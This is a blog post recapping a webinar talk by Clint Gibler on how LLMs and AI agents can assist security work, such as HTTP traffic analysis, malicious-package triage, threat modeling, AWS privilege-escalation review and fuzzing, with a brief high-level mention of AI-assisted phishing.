ChatGPT is just the beginning. New AI tools are launching often, and new tools bring new functionality. With the long history of machine learning being used as part of cybersecurity, how are recent developments in AI and LLMs (Large Language Models) becoming part of the cybersecurity landscape? How can AI tools make cybersecurity practices more efficient? And will AI replace cybersecurity? (Spoiler alert: it won't.)
As part of our CloudSec 360 series, Wiz spoke with Clint Gibler, Head of Security Research at Semgrep (and the founder of the tldrsec.com newsletter). Clint joined us to discuss several use cases for AI in the cybersecurity space, and to share his own ideas about how security experts can leverage AI tools to their advantage.
Clint’s top observations:
AI can help with some problems, in some ways, if used correctly.
AI doesn’t work perfectly every time; it’s a tool that we can use to do our work more quickly, easily, and cheaply.
AI doesn’t make everything perfect; the point is to use it like any other tool, in an attempt to solve real problems.
Definitions and concepts around AI and LLMs
To establish an understanding among the webinar audience, Clint started his talk with a quick definition of Large Language Models. You can think of LLMs like next-word auto-complete apps; they’re essentially trained by taking a huge amount of data from the internet (such as Wikipedia, stack overflow, textbooks, etc.), and combining it with a lot of compute time and training time. The result is a surprisingly smart model! Some primary players in the LLM space are OpenAI, ChatGPT, Google’s Bard, Anthropic’s Claude, and Hugging Face (an AI community collaboration platform).
An AI prompt has a few core components: a user persona (security expert, lawyer, etc.), a task (analyze the following code), and data (code, logs, user reviews). Clint also defined the following terms in context of AI:
Few-shot prompting: Guiding the model with a small number of examples of input that show what you want the model to do. For example, if you’re trying to categorize a log as malicious or not, you might include a couple of lines and say, “this is bad/this is safe. "
Context window: How much text you can give an LLM at one time; an active area of research.
Vector DB: At times you'll be working with more text than you can fit within a 4000-token limit. You might want to store it in a Vector DB, where you can index content from PDFs, transcripts, code bases, your company’s docs or internal KB, etc. You want to be able to have the LLM easily reference those items and use them as context in its answers.
Retrieval Augmented Generation: A fancy term for a way to automatically concatenate relevant or supporting information into your prompt.
Agent: You may want to go beyond one request and response; you may want the LLM to do some planning or map out multiple steps at once. This is referred to as using the LLM as an agent.
Tools: You might want to give agents the ability to do things more than just analyze text, for example do a google search, make an API request, or run some code.
Use cases: how AI is used, and how it could be used
Next, Clint moved on to a list of various use cases; specifically, those where AI can be used in a security context (both by people attacking systems and people defending them). Clint’s examples were plentiful and fascinating. We’ll discuss some — but not all — of them here. (For his full list of examples, we encourage you to watch the full webinar!)
Most companies creating LLMs try to design them in a way that prevents them being used for criminal activity, but there are exceptions. Cybercriminals have found ways to use generative AI for phishing. Although many phishing attempts are easy to spot, the tools are becoming more sophisticated. One such example is CICERO, an AI agent that was highly effective at playing the game “Diplomacy.” The agent was able to persuade, negotiate, and cooperate with people. In fact, it attained double the average score of human players on webdiplomacy.net. Similarly, an LLM agent can be directed to scrape an individual’s social media profiles, then send a tailored phishing message to that person and engage with them if they respond. Fortunately, there are companies working on products designed to identify AI-generated (vs. human-generated) content. But, as Clint says, “it’s a cat and mouse game,” as other tools are being designed to make AI content undetectable.
Moving on to web security: Clint has noticed a couple of Burp Suite extensions that leverage LLMs to analyze HTTP requests and responses and search for potential security issues within them. Spokespeople from Tenable said that one of these extensions was able to successfully find cross-site scripting and misconfigured HTTP headers. Clint suggested that this type of tool would be useful if it could be expanded. For example, these extensions could look at sequences of requests (such as the checkout flow on an ecommerce site, or an OAuth or SAML protocol). Imagine passing those remote function calls (RFCs) to an LLM to show it what various requests mean, or which parameters are important. The LLM could then potentially make interesting observations about those sequences. Furthermore, if an Agent were directed to make HTTP requests itself, it could observe behavior and tweak parameters. Clint then described a project designed to automatically generate an OpenAPI Specification from source code, using Semgrep to extract routes and parameters and an LLM to infer the types of parameters.
Clint has seen several companies doing work in this space, although “how they all work is a little bit different.” In this example, imagine that you’re continuously watching package managers like npm and PyPi. As new packages emerge, you analyze them with a lightweight static analysis tool, then pass them to an LLM with some combination of the following: a persona (an expert cybersecurity researcher), some capabilities (like writing to the file system or making network requests), metadata (similarities to names of other packages, or the age of the package manager’s account). Perhaps your tooling has already flagged some of the source code as suspicious. You could combine some set of these factors and then ask the LLM to assign a risk rating to the package, scoring its likelihood of being malware from 0 - 10. (A human would then probably triage this assessment.)
With a threat modeling tool like Stirde GPT, you provide a description of your app and specify what kind of data it processes. Stride GPT then spits out a threat model, an attack tree, and/or some mitigating controls. Because threat modeling is text heavy, this is a great use case for LLMs. But what else could threat modeling do with AI? Could we programmatically pull in the description of the app (the scope doc)? And could a lightweight code analysis also be gathered by AI? Could we gather everything we would need automatically, present it to the user and ask them if it’s right, let the user edit it, and then submit it? With this idea, the goal is not for the output to be perfect, but to save time, as editing is generally easier and faster than writing from scratch. Clint’s conclusion: “even if it’s not perfect; if we’re saving people a lot of time, I think that’s still a win.”
In the cloud security space, a tool called EscalateGPT queries the AWS API, returns a bunch of IAM policies, passes them to open AI, and asks it to look for privilege escalation. In testing against real-world AWS environments, users found that GPT4 managed to identify complex scenarios of privilege escalation based on non-trivial policies through multi-IAM accounts. Clint says he’d be curious to see a benchmark of how well this tool does against existing tools that were hand-coded for the same purpose.
For fuzzing to be effective, we need good code coverage — the more code you’re exercising, the more likely you are to find bugs. Clint's idea is to take your existing fuzzing infrastructure and ask, “where don’t we have good coverage today?” You might pass that to an LLM that generates code and writes fuzzing test harnesses for you; then you might execute more functions in parts of the code that you haven’t exercised yet. Clint cited a blog from Google on AI-Powered Fuzzing as an interesting resource.
Clint's reflections on AI
The possibilities for AI within cybersecurity are seemingly endless; but AI is not a catch-all solution. It can help with some problems, in some ways, when it’s used correctly. And even if it doesn't work perfectly, it can be used to make a lot of work faster, easier, and cheaper. Clint suggests thinking of AI as a tool, like any other tool, that can be used to solve real user problems.
Dive deeper into Clint’s examples, ideas, and resources
Watch the full webinar to hear Clint’s comprehensive, thoughtful talk on AI and cybersecurity!